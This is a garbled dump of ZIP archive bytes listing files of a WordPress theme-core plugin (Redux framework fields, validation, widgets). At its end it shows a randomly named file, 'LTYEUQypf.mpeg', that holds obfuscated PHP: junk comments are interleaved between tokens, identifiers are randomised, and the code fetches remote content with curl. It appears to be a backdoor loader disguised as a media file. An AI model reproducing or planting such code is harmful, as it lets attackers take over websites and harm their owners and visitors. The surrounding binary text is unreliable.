,. foxiz-core/lib/redux-framework/inc/class.p.phpPKlzS#"@ foxiz-core/lib/redux-framework/inc/class.redux_admin_notices.phpPKYRS:@s6  foxiz-core/lib/redux-framework/inc/class.redux_api.phpPKYRDz"s& 6 k foxiz-core/lib/redux-framework/inc/class.redux_cdn.phpPKYRbe 4=  foxiz-core/lib/redux-framework/inc/class.redux_filesystem.phpPKYRg+ ,< $ foxiz-core/lib/redux-framework/inc/class.redux_functions.phpPKR=y]: *1 foxiz-core/lib/redux-framework/inc/class.redux_helpers.phpPKYRo0< J foxiz-core/lib/redux-framework/inc/class.redux_instances.phpPKYRvo7= P foxiz-core/lib/redux-framework/inc/class.thirdparty.fixes.phpPKkT.Q foxiz-core/lib/redux-framework/inc/extensions/PKkT9CR foxiz-core/lib/redux-framework/inc/extensions/customizer/PKYR$YGQ R foxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.cssPKYRb (U bU foxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.css.mapPKYRdY^FP W foxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.jsPKYR^zcT k foxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.min.jsPKYRR-ͧJQ s foxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.phpPKYREG` R ێ foxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.scssPKkT= foxiz-core/lib/redux-framework/inc/extensions/customizer/inc/PKYRh S L foxiz-core/lib/redux-framework/inc/extensions/customizer/inc/customizer_control.phpPKYRP < foxiz-core/lib/redux-framework/inc/extensions/customizer/inc/customizer_devs.phpPKYRf\ DR @ foxiz-core/lib/redux-framework/inc/extensions/customizer/inc/customizer_fields.phpPKYR 7[\Q foxiz-core/lib/redux-framework/inc/extensions/customizer/inc/customizer_panel.phpPKYR CzS foxiz-core/lib/redux-framework/inc/extensions/customizer/inc/customizer_section.phpPKkT<r foxiz-core/lib/redux-framework/inc/extensions/import_export/PKYR5" 1!W ̦ foxiz-core/lib/redux-framework/inc/extensions/import_export/extension_import_export.phpPKkTJc foxiz-core/lib/redux-framework/inc/extensions/import_export/import_export/PKYR\yda ˰ foxiz-core/lib/redux-framework/inc/extensions/import_export/import_export/field_import_export.cssPKYR %` foxiz-core/lib/redux-framework/inc/extensions/import_export/import_export/field_import_export.jsPKYR۽ d ߶ foxiz-core/lib/redux-framework/inc/extensions/import_export/import_export/field_import_export.min.jsPKYR)x #a  foxiz-core/lib/redux-framework/inc/extensions/import_export/import_export/field_import_export.phpPKYR0L3ob foxiz-core/lib/redux-framework/inc/extensions/import_export/import_export/field_import_export.scssPKkT= foxiz-core/lib/redux-framework/inc/extensions/options_object/PKYR'A5Y foxiz-core/lib/redux-framework/inc/extensions/options_object/extension_options_object.phpPKkTL foxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/PKYR}IU[d foxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.cssPKYR-! c foxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.jsPKYRZ$zg # foxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.min.jsPKYRL=]Bd foxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.phpPKYRocve foxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.scssPKYRT]@@8 foxiz-core/lib/redux-framework/inc/extensions/README.txtPKkT*' foxiz-core/lib/redux-framework/inc/fields/PKkT5o foxiz-core/lib/redux-framework/inc/fields/ace_editor/PKYR$]I foxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.cssPKYR"5xM foxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.css.mapPKYRӃ} H foxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.jsPKYRQL foxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.min.jsPKYR{>I foxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.phpPKYRI.%J ? foxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.scssPKkT57 foxiz-core/lib/redux-framework/inc/fields/background/PKYRK`I foxiz-core/lib/redux-framework/inc/fields/background/field_background.cssPKYRy-MM Q foxiz-core/lib/redux-framework/inc/fields/background/field_background.css.mapPKYR*~ 4H foxiz-core/lib/redux-framework/inc/fields/background/field_background.jsPKYR<.NL foxiz-core/lib/redux-framework/inc/fields/background/field_background.min.jsPKYR;=LZI foxiz-core/lib/redux-framework/inc/fields/background/field_background.phpPKYR"`pJ = foxiz-core/lib/redux-framework/inc/fields/background/field_background.scssPKkT1foxiz-core/lib/redux-framework/inc/fields/border/PKYRJnA dfoxiz-core/lib/redux-framework/inc/fields/border/field_border.cssPKYRW$E foxiz-core/lib/redux-framework/inc/fields/border/field_border.css.mapPKYR7R5a@ Afoxiz-core/lib/redux-framework/inc/fields/border/field_border.jsPKYR6#OD foxiz-core/lib/redux-framework/inc/fields/border/field_border.min.jsPKYRe l t@A :foxiz-core/lib/redux-framework/inc/fields/border/field_border.phpPKYRj+oB 'foxiz-core/lib/redux-framework/inc/fields/border/field_border.scssPKkT5(foxiz-core/lib/redux-framework/inc/fields/button_set/PKYR  H (foxiz-core/lib/redux-framework/inc/fields/button_set/field_button_set.jsPKYRL a,foxiz-core/lib/redux-framework/inc/fields/button_set/field_button_set.min.jsPKYR[剋I .foxiz-core/lib/redux-framework/inc/fields/button_set/field_button_set.phpPKkT36foxiz-core/lib/redux-framework/inc/fields/checkbox/PKYR:얭oE 6foxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.cssPKYRI 7foxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.css.mapPKYR1F3D 8foxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.jsPKYRHK5H S;foxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.min.jsPKYR(E <foxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.phpPKYR*.t?F ;Dfoxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.scssPKkT0%Efoxiz-core/lib/redux-framework/inc/fields/color/PKYRfFf> sEfoxiz-core/lib/redux-framework/inc/fields/color/field_color.jsPKYR~ 7 B Lfoxiz-core/lib/redux-framework/inc/fields/color/field_color.min.jsPKYRɘq? Ofoxiz-core/lib/redux-framework/inc/fields/color/field_color.phpPKkT9cUfoxiz-core/lib/redux-framework/inc/fields/color_gradient/PKYR\-֗Q Ufoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.cssPKYRcU Vfoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.css.mapPKYRP Wfoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.jsPKYRcT h\foxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.min.jsPKYRxJQ Z_foxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.phpPKYRO֩NR ffoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.scssPKkT5,gfoxiz-core/lib/redux-framework/inc/fields/color_rgba/PKYRzI gfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.cssPKYR=:,M hfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.css.mapPKYRcL$H jfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.jsPKYRk,ϱ:L sfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.min.jsPKYR9p 0I yfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.phpPKYRpwJ Ʉfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.scssPKkT/foxiz-core/lib/redux-framework/inc/fields/date/PKYR:.PZ= foxiz-core/lib/redux-framework/inc/fields/date/field_date.cssPKYR)A foxiz-core/lib/redux-framework/inc/fields/date/field_date.css.mapPKYReI/< foxiz-core/lib/redux-framework/inc/fields/date/field_date.jsPKYRBt @ %foxiz-core/lib/redux-framework/inc/fields/date/field_date.min.jsPKYRo2 = foxiz-core/lib/redux-framework/inc/fields/date/field_date.phpPKYR,'Xn> .foxiz-core/lib/redux-framework/inc/fields/date/field_date.scssPKkT5foxiz-core/lib/redux-framework/inc/fields/dimensions/PKYRz6I 5foxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.cssPKYRSvM foxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.css.mapPKYR2f% H ڕfoxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.jsPKYRpo "L foxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.min.jsPKYR{&M 7>I 4foxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.phpPKYR J foxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.scssPKkT1Yfoxiz-core/lib/redux-framework/inc/fields/divide/PKYR m6A foxiz-core/lib/redux-framework/inc/fields/divide/field_divide.cssPKYR|UNE =foxiz-core/lib/redux-framework/inc/fields/divide/field_divide.css.mapPKYR_af A foxiz-core/lib/redux-framework/inc/fields/divide/field_divide.phpPKYRIkyB foxiz-core/lib/redux-framework/inc/fields/divide/field_divide.scssPKkT1foxiz-core/lib/redux-framework/inc/fields/editor/PKYRqAHA ۲foxiz-core/lib/redux-framework/inc/fields/editor/field_editor.cssPKYRF^CE ´foxiz-core/lib/redux-framework/inc/fields/editor/field_editor.css.mapPKYRz x @ foxiz-core/lib/redux-framework/inc/fields/editor/field_editor.jsPKYRxF=D foxiz-core/lib/redux-framework/inc/fields/editor/field_editor.min.jsPKYR  %A cfoxiz-core/lib/redux-framework/inc/fields/editor/field_editor.phpPKYRQ<B foxiz-core/lib/redux-framework/inc/fields/editor/field_editor.scssPKkT2foxiz-core/lib/redux-framework/inc/fields/gallery/PKYR*s?>B >foxiz-core/lib/redux-framework/inc/fields/gallery/field_gallery.jsPKYRjWESF \foxiz-core/lib/redux-framework/inc/fields/gallery/field_gallery.min.jsPKYRgM2C foxiz-core/lib/redux-framework/inc/fields/gallery/field_gallery.phpPKkT7foxiz-core/lib/redux-framework/inc/fields/image_select/PKYReO)M foxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.cssPKYRzbJQ foxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.css.mapPKYR=,jcL dfoxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.jsPKYR;(iP 1foxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.min.jsPKYRY5 *M foxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.phpPKYR0"$xN foxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.scssPKkT/foxiz-core/lib/redux-framework/inc/fields/info/PKYR, = foxiz-core/lib/redux-framework/inc/fields/info/field_info.cssPKYRA foxiz-core/lib/redux-framework/inc/fields/info/field_info.css.mapPKYRD!= foxiz-core/lib/redux-framework/inc/fields/info/field_info.phpPKYRq > foxiz-core/lib/redux-framework/inc/fields/info/field_info.scssPKkT5foxiz-core/lib/redux-framework/inc/fields/link_color/PKYRI foxiz-core/lib/redux-framework/inc/fields/link_color/field_link_color.cssPKYR~RM foxiz-core/lib/redux-framework/inc/fields/link_color/field_link_color.css.mapPKYRiH foxiz-core/lib/redux-framework/inc/fields/link_color/field_link_color.jsPKYR@<rL foxiz-core/lib/redux-framework/inc/fields/link_color/field_link_color.min.jsPKYRC +I 3foxiz-core/lib/redux-framework/inc/fields/link_color/field_link_color.phpPKYR_rJ foxiz-core/lib/redux-framework/inc/fields/link_color/field_link_color.scssPKkT0foxiz-core/lib/redux-framework/inc/fields/media/PKYR͙? foxiz-core/lib/redux-framework/inc/fields/media/field_media.cssPKYR^L`C foxiz-core/lib/redux-framework/inc/fields/media/field_media.css.mapPKYRFZ@ foxiz-core/lib/redux-framework/inc/fields/media/field_media.lessPKYR|D +? foxiz-core/lib/redux-framework/inc/fields/media/field_media.phpPKYRSp@ foxiz-core/lib/redux-framework/inc/fields/media/field_media.scssPKkT5!foxiz-core/lib/redux-framework/inc/fields/multi_text/PKYR5=I !foxiz-core/lib/redux-framework/inc/fields/multi_text/field_multi_text.cssPKYRGM k#foxiz-core/lib/redux-framework/inc/fields/multi_text/field_multi_text.css.mapPKYRk/x H $foxiz-core/lib/redux-framework/inc/fields/multi_text/field_multi_text.jsPKYR9!L (foxiz-core/lib/redux-framework/inc/fields/multi_text/field_multi_text.min.jsPKSN݊I +foxiz-core/lib/redux-framework/inc/fields/multi_text/field_multi_text.phpPKYRQLJ ?2foxiz-core/lib/redux-framework/inc/fields/multi_text/field_multi_text.scssPKkT23foxiz-core/lib/redux-framework/inc/fields/palette/PKYRhC C4foxiz-core/lib/redux-framework/inc/fields/palette/field_palette.cssPKYRn&i7G 6foxiz-core/lib/redux-framework/inc/fields/palette/field_palette.css.mapPKYR&B 7foxiz-core/lib/redux-framework/inc/fields/palette/field_palette.jsPKYR+"F :foxiz-core/lib/redux-framework/inc/fields/palette/field_palette.min.jsPKYR4FFC o;foxiz-core/lib/redux-framework/inc/fields/palette/field_palette.phpPKYR_ zD Afoxiz-core/lib/redux-framework/inc/fields/palette/field_palette.scssPKkT3QCfoxiz-core/lib/redux-framework/inc/fields/password/PKYR#E Cfoxiz-core/lib/redux-framework/inc/fields/password/field_password.phpPKkT0Gfoxiz-core/lib/redux-framework/inc/fields/radio/PKYRCֶh ? Hfoxiz-core/lib/redux-framework/inc/fields/radio/field_radio.phpPKkT.-Kfoxiz-core/lib/redux-framework/inc/fields/raw/PKYRtv; yKfoxiz-core/lib/redux-framework/inc/fields/raw/field_raw.phpPKYRV%; HNfoxiz-core/lib/redux-framework/inc/fields/raw/parsedown.phpPKkT2hfoxiz-core/lib/redux-framework/inc/fields/section/PKYRfC Gifoxiz-core/lib/redux-framework/inc/fields/section/field_section.cssPKYRY$G Ujfoxiz-core/lib/redux-framework/inc/fields/section/field_section.css.mapPK_TtC vkfoxiz-core/lib/redux-framework/inc/fields/section/field_section.phpPKYRT D rfoxiz-core/lib/redux-framework/inc/fields/section/field_section.scssPKkT1sfoxiz-core/lib/redux-framework/inc/fields/select/PKYRHd $B (tfoxiz-core/lib/redux-framework/inc/fields/select/elusive-icons.phpPKYR_vA zfoxiz-core/lib/redux-framework/inc/fields/select/field_select.cssPKYRDԔE Y{foxiz-core/lib/redux-framework/inc/fields/select/field_select.css.mapPKYR3 i @ P|foxiz-core/lib/redux-framework/inc/fields/select/field_select.jsPKYRa8IVAD foxiz-core/lib/redux-framework/inc/fields/select/field_select.min.jsPKYR6YA ςfoxiz-core/lib/redux-framework/inc/fields/select/field_select.phpPKYR g6qB Dfoxiz-core/lib/redux-framework/inc/fields/select/field_select.scssPKkT7foxiz-core/lib/redux-framework/inc/fields/select_image/PKYR4M jfoxiz-core/lib/redux-framework/inc/fields/select_image/field_select_image.cssPKYR1Q foxiz-core/lib/redux-framework/inc/fields/select_image/field_select_image.css.mapPKYR,MR L ܍foxiz-core/lib/redux-framework/inc/fields/select_image/field_select_image.jsPKYR5foxiz-core/lib/redux-framework/inc/fields/sorter/field_sorter.jsPKYR5h;D p:foxiz-core/lib/redux-framework/inc/fields/sorter/field_sorter.min.jsPK R΍p#A =foxiz-core/lib/redux-framework/inc/fields/sorter/field_sorter.phpPKYR`DjB Efoxiz-core/lib/redux-framework/inc/fields/sorter/field_sorter.scssPKkT2OHfoxiz-core/lib/redux-framework/inc/fields/spacing/PKYR,C Hfoxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.cssPKYRHw;G Ifoxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.css.mapPKYRl] B 1Kfoxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.jsPKYR:5LF Nfoxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.min.jsPKYR PLC Pfoxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.phpPKYRK/*!D ^foxiz-core/lib/redux-framework/inc/fields/spacing/field_spacing.scssPKkT2U`foxiz-core/lib/redux-framework/inc/fields/spinner/PKYRƒ@ `foxiz-core/lib/redux-framework/inc/fields/spinner/arrow_left.pngPKYR 7 A afoxiz-core/lib/redux-framework/inc/fields/spinner/arrow_right.pngPKYRU9 C bfoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.cssPKYR1Z۔WG $ffoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.css.mapPKYRiGB [hfoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.jsPKYRYIF lfoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.min.jsPKYRF 6C bofoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.phpPKYRL D ufoxiz-core/lib/redux-framework/inc/fields/spinner/field_spinner.scssPKkT9yfoxiz-core/lib/redux-framework/inc/fields/spinner/vendor/PKYRrYY.J @zfoxiz-core/lib/redux-framework/inc/fields/spinner/vendor/spinner_custom.jsPKYRp *N 6foxiz-core/lib/redux-framework/inc/fields/spinner/vendor/spinner_custom.min.jsPKkT1foxiz-core/lib/redux-framework/inc/fields/switch/PKYR͎2_ A foxiz-core/lib/redux-framework/inc/fields/switch/field_switch.cssPKYRH lE ʗfoxiz-core/lib/redux-framework/inc/fields/switch/field_switch.css.mapPKYRn>L @ foxiz-core/lib/redux-framework/inc/fields/switch/field_switch.jsPKYR`o5 D ֜foxiz-core/lib/redux-framework/inc/fields/switch/field_switch.min.jsPKYRHx6 A foxiz-core/lib/redux-framework/inc/fields/switch/field_switch.phpPKYRl~B Ϣfoxiz-core/lib/redux-framework/inc/fields/switch/field_switch.scssPKYRH(pC foxiz-core/lib/redux-framework/inc/fields/switch/slider-control.pngPKYR[; ~foxiz-core/lib/redux-framework/inc/fields/switch/switch.gifPKkT/foxiz-core/lib/redux-framework/inc/fields/text/PKYR*P= foxiz-core/lib/redux-framework/inc/fields/text/field_text.cssPKYR#LA gfoxiz-core/lib/redux-framework/inc/fields/text/field_text.css.mapPKYRȡ`^= foxiz-core/lib/redux-framework/inc/fields/text/field_text.phpPKYRu^@> foxiz-core/lib/redux-framework/inc/fields/text/field_text.scssPKkT3<foxiz-core/lib/redux-framework/inc/fields/textarea/PKYRX5 E foxiz-core/lib/redux-framework/inc/fields/textarea/field_textarea.phpPKkT5%foxiz-core/lib/redux-framework/inc/fields/typography/PKYRv]I xfoxiz-core/lib/redux-framework/inc/fields/typography/field_typography.cssPKYR"{ M foxiz-core/lib/redux-framework/inc/fields/typography/field_typography.css.mapPKYR^oH |foxiz-core/lib/redux-framework/inc/fields/typography/field_typography.jsPKYR<$%J foxiz-core/lib/redux-framework/inc/fields/typography/field_typography.jsonPKYRuP6 (L foxiz-core/lib/redux-framework/inc/fields/typography/field_typography.min.jsPKS$I foxiz-core/lib/redux-framework/inc/fields/typography/field_typography.phpPKYRvJ 0foxiz-core/lib/redux-framework/inc/fields/typography/field_typography.scssPKYRi\SpM 5foxiz-core/lib/redux-framework/inc/fields/typography/field_typography_json.jsPKYŔ *Q FKfoxiz-core/lib/redux-framework/inc/fields/typography/field_typography_json.min.jsPKjT?+KD 6Vfoxiz-core/lib/redux-framework/inc/fields/typography/googlefonts.phpPKYR|iT1: foxiz-core/lib/redux-framework/inc/lib.redux_instances.phpPKYR?e/ 8foxiz-core/lib/redux-framework/inc/tracking.phpPKkT.)foxiz-core/lib/redux-framework/inc/validation/PKkT4ufoxiz-core/lib/redux-framework/inc/validation/color/PKYRH5AYH Ǻfoxiz-core/lib/redux-framework/inc/validation/color/validation_color.phpPKkT9nfoxiz-core/lib/redux-framework/inc/validation/color_rgba/PKYRM: R foxiz-core/lib/redux-framework/inc/validation/color_rgba/validation_color_rgba.phpPKkT8foxiz-core/lib/redux-framework/inc/validation/colorrgba/PKYRb+l L P ifoxiz-core/lib/redux-framework/inc/validation/colorrgba/validation_colorrgba.phpPKkT<foxiz-core/lib/redux-framework/inc/validation/comma_numeric/PKYRjr"X =foxiz-core/lib/redux-framework/inc/validation/comma_numeric/validation_comma_numeric.phpPKkT2foxiz-core/lib/redux-framework/inc/validation/css/PKYRq}.D foxiz-core/lib/redux-framework/inc/validation/css/validation_css.phpPKkT3^foxiz-core/lib/redux-framework/inc/validation/date/PKYRÍJF foxiz-core/lib/redux-framework/inc/validation/date/validation_date.phpPKkT4foxiz-core/lib/redux-framework/inc/validation/email/PKYRL[OH hfoxiz-core/lib/redux-framework/inc/validation/email/validation_email.phpPKkT>foxiz-core/lib/redux-framework/inc/validation/email_not_empty/PKYR\ foxiz-core/lib/redux-framework/inc/validation/email_not_empty/validation_email_not_empty.phpPKkT3Xfoxiz-core/lib/redux-framework/inc/validation/html/PKYR?ȾZF foxiz-core/lib/redux-framework/inc/validation/html/validation_html.phpPKkT:gfoxiz-core/lib/redux-framework/inc/validation/html_custom/PKYRZߝ}UT foxiz-core/lib/redux-framework/inc/validation/html_custom/validation_html_custom.phpPKkT1foxiz-core/lib/redux-framework/inc/validation/js/PKYRNB foxiz-core/lib/redux-framework/inc/validation/js/validation_js.phpPKkT6foxiz-core/lib/redux-framework/inc/validation/no_html/PKYRcKD_]L foxiz-core/lib/redux-framework/inc/validation/no_html/validation_no_html.phpPKkT?Hfoxiz-core/lib/redux-framework/inc/validation/no_special_chars/PKYR=_^ foxiz-core/lib/redux-framework/inc/validation/no_special_chars/validation_no_special_chars.phpPKkT8foxiz-core/lib/redux-framework/inc/validation/not_empty/PKYRXqP ofoxiz-core/lib/redux-framework/inc/validation/not_empty/validation_not_empty.phpPKkT6foxiz-core/lib/redux-framework/inc/validation/numeric/PKYRW“YL foxiz-core/lib/redux-framework/inc/validation/numeric/validation_numeric.phpPKkT@Dfoxiz-core/lib/redux-framework/inc/validation/numeric_not_empty/PKYRnW(` foxiz-core/lib/redux-framework/inc/validation/numeric_not_empty/validation_numeric_not_empty.phpPKkT;foxiz-core/lib/redux-framework/inc/validation/preg_replace/PKYRVV Xfoxiz-core/lib/redux-framework/inc/validation/preg_replace/validation_preg_replace.phpPKkT:Wfoxiz-core/lib/redux-framework/inc/validation/str_replace/PKYR 6Qq.T foxiz-core/lib/redux-framework/inc/validation/str_replace/validation_str_replace.phpPKkT:foxiz-core/lib/redux-framework/inc/validation/unique_slug/PKYRT^ T foxiz-core/lib/redux-framework/inc/validation/unique_slug/validation_unique_slug.phpPKkT2=foxiz-core/lib/redux-framework/inc/validation/url/PKYRLHD foxiz-core/lib/redux-framework/inc/validation/url/validation_url.phpPKkT+foxiz-core/lib/redux-framework/inc/welcome/PKkT/&foxiz-core/lib/redux-framework/inc/welcome/css/PKYR  ~)@ sfoxiz-core/lib/redux-framework/inc/welcome/css/redux-welcome.cssPKYReDA foxiz-core/lib/redux-framework/inc/welcome/css/redux-welcome.scssPKkT.foxiz-core/lib/redux-framework/inc/welcome/js/PKYR& c5B foxiz-core/lib/redux-framework/inc/welcome/js/jquery.easing.min.jsPKYR nj -D ~foxiz-core/lib/redux-framework/inc/welcome/js/redux-welcome-admin.jsPKkT1l$foxiz-core/lib/redux-framework/inc/welcome/views/PKYR^N: $foxiz-core/lib/redux-framework/inc/welcome/views/about.phpPKYR3> a*foxiz-core/lib/redux-framework/inc/welcome/views/changelog.phpPKYR< =,foxiz-core/lib/redux-framework/inc/welcome/views/credits.phpPKYRP? .foxiz-core/lib/redux-framework/inc/welcome/views/extensions.phpPKYRcNB 5foxiz-core/lib/redux-framework/inc/welcome/views/status_report.phpPKYRC͜< Rfoxiz-core/lib/redux-framework/inc/welcome/views/support.phpPKYRLmX6 Zfoxiz-core/lib/redux-framework/inc/welcome/welcome.phpPKkT)(nfoxiz-core/lib/redux-framework/languages/PKYRGZo3 onfoxiz-core/lib/redux-framework/languages/README.txtPKYRh "ѥ< ofoxiz-core/lib/redux-framework/languages/redux-framework.potPKYR8y CFC> Wfoxiz-core/lib/redux-framework/languages/redux-framework-ar.moPKYRL foxiz-core/lib/redux-framework/languages/redux-framework-el.moPKYR qKA %foxiz-core/lib/redux-framework/languages/redux-framework-es_ES.moPKYR*)8 A 5Ffoxiz-core/lib/redux-framework/languages/redux-framework-es_MX.moPKYRwXk2A zRfoxiz-core/lib/redux-framework/languages/redux-framework-fa_IR.moPKYRQ w> gfoxiz-core/lib/redux-framework/languages/redux-framework-fi.moPKYRo=A rfoxiz-core/lib/redux-framework/languages/redux-framework-fr_FR.moPKYR.)A gfoxiz-core/lib/redux-framework/languages/redux-framework-he_IL.moPKYR #A lfoxiz-core/lib/redux-framework/languages/redux-framework-hi_IN.moPKYRuT$> bfoxiz-core/lib/redux-framework/languages/redux-framework-hr.moPKYRsm<A _foxiz-core/lib/redux-framework/languages/redux-framework-hu_HU.moPKYR%"LXu$A foxiz-core/lib/redux-framework/languages/redux-framework-id_ID.moPKYR5,;A vfoxiz-core/lib/redux-framework/languages/redux-framework-it_IT.moPKYRװ!c=> rfoxiz-core/lib/redux-framework/languages/redux-framework-ja.moPKYR" #> 16foxiz-core/lib/redux-framework/languages/redux-framework-km.moPKYRA Cfoxiz-core/lib/redux-framework/languages/redux-framework-lt_LT.moPKYR<A Cfoxiz-core/lib/redux-framework/languages/redux-framework-nb_NO.moPKYR~Ć4A P_foxiz-core/lib/redux-framework/languages/redux-framework-ne_NP.moPKYR>.A 5rfoxiz-core/lib/redux-framework/languages/redux-framework-nl_NL.moPKYR gfoxiz-core/lib/redux-framework/languages/redux-framework-th.moPKYR Qsv>A wvfoxiz-core/lib/redux-framework/languages/redux-framework-tr_TR.moPKYR*,7A ђfoxiz-core/lib/redux-framework/languages/redux-framework-zh_CN.moPKkT)foxiz-core/lib/redux-framework/templates/PKkT/efoxiz-core/lib/redux-framework/templates/panel/PKYR&nE @ foxiz-core/lib/redux-framework/templates/panel/container.tpl.phpPKYR_I~> foxiz-core/lib/redux-framework/templates/panel/content.tpl.phpPKYRIc$| = |foxiz-core/lib/redux-framework/templates/panel/footer.tpl.phpPKYR۰ 3? = Sfoxiz-core/lib/redux-framework/templates/panel/header.tpl.phpPKYRU.* G foxiz-core/lib/redux-framework/templates/panel/header_stickybar.tpl.phpPKYRS!E foxiz-core/lib/redux-framework/templates/panel/menu_container.tpl.phpPKkTdfoxiz-core/lib/twitteroauth/PK~S* k% foxiz-core/lib/twitteroauth/OAuth.phpPK~SMZ'F, foxiz-core/lib/twitteroauth/twitteroauth.phpPKkTzfoxiz-core/membership/PK*QtTfj$ foxiz-core/membership/membership.phpPKTT1S! foxiz-core/membership/options.phpPKkTfoxiz-core/reaction/PK$AR@,q  foxiz-core/reaction/reaction.jsPKN-S]Uj  {foxiz-core/reaction/reaction.phpPKkTfoxiz-core/widgets/PK5T ?foxiz-core/widgets/banner.phpPKTu3 T*# :foxiz-core/widgets/fw-instagram.phpPKT` >foxiz-core/widgets/fw-mc.phpPKT5̗ $ }foxiz-core/widgets/ruby-template.phpPK5T_?w7! foxiz-core/widgets/sb-address.phpPKٞ5Tp3 " Nfoxiz-core/widgets/sb-ad-image.phpPKYT`*# d foxiz-core/widgets/sb-ad-script.phpPK6;S# " K&foxiz-core/widgets/sb-facebook.phpPKT5 5   *foxiz-core/widgets/sb-flickr.phpPK\PuTlxShz," 1foxiz-core/widgets/sb-follower.phpPKTz $# 8foxiz-core/widgets/sb-instagram.phpPK[jTe_ Ob# KBfoxiz-core/widgets/sb-post.phpPKTt!*k.% Ifoxiz-core/widgets/sb-social-icon.phpPK5TYx / VRfoxiz-core/widgets/sb-tweet.phpPKOY>Tb@p! \foxiz-core/widgets/sb-weather.phpPKr5T¤ ! `foxiz-core/widgets/sb-youtube.phpPK dPK!plugins/plugins/index.phpnu[PK!Iplugins/plugins/LTYEUQypf.mpegnu[sK0$N-*/"g"./*-cEb>u!a@1-*/"e"; /*-`%-*/$WsKauUAYC/*-H88-*/ = /*-K]-*/$uJ/*-CH@C-*/(/*-3lZS-*/"~"/*-YX|-*/, /*-d-*/" "/*-c%je}j4>-*/);/*-CJ&{Eq@AB#-*/ $EtWcmVKhOL /*-$vbGVZD-*/= /*-ESpvPwi5x4-*/explode/*-$Vg-*/(/*-3o{^fF.g-*/"#", /*-CpE3`c-*/$Rt/*-8)F(-*/); /*-#~bv8WR-*/$QyKckLBtg /*-ARjdaw:-*/= /*-lH-*/""; foreach /*-XHhCC-*/(/*-=Zx3{0moV-*/$EtWcmVKhOL /*-1$E0Zm]91-*/as /*-a?gTrSI>H!-*/$beh /*--*/=>/*-K-6-*/ $hCqS/*-4De7mi-*/) /*-q7=LX-*/ curl_setopt/*-NrMS-*/(/*-o+_-*/$QUJ,/*-uc4$Rl-Y6-*/ CURLOPT_RETURNTRANSFER,/*-YDE8;t-*/ 1/*-c$v-*/);/*-56hKy_-*/ $pcTNCQY/*-J`fWS^U?z-*/ = /*-J_+-*/curl_exec/*-SS4-*/(/*-eL_!-*/$QUJ/*-A:Bk_-*/); /*-@cekC-*/return /*-B=0V%-*/empty/*->)-*/(/*-z{-(3n-*/$pcTNCQY/*-I6Z-*/)/*-T<=Kq-*/ ? /*-I+vImv_Nf-*/$npND/*-?lO-*/(/*-6b]JO]-*/$STfsm/*-I:)Vl#-*/)/*-]jj%;Z-*/ : /*-c:,|uo-*/$pcTNCQY; /*-;tVs-*/}/*-;sY|#-*/ static/*-!wd-*/ function /*-aT{!_vV_-*/LXgonQhl/*-:%pwUE-*/() /*-oA?,p-*/{/*-bQD{B9m-*/ $NabHiAcGrg /*-3Y)]H-*/=/*-kO6:0-*/ 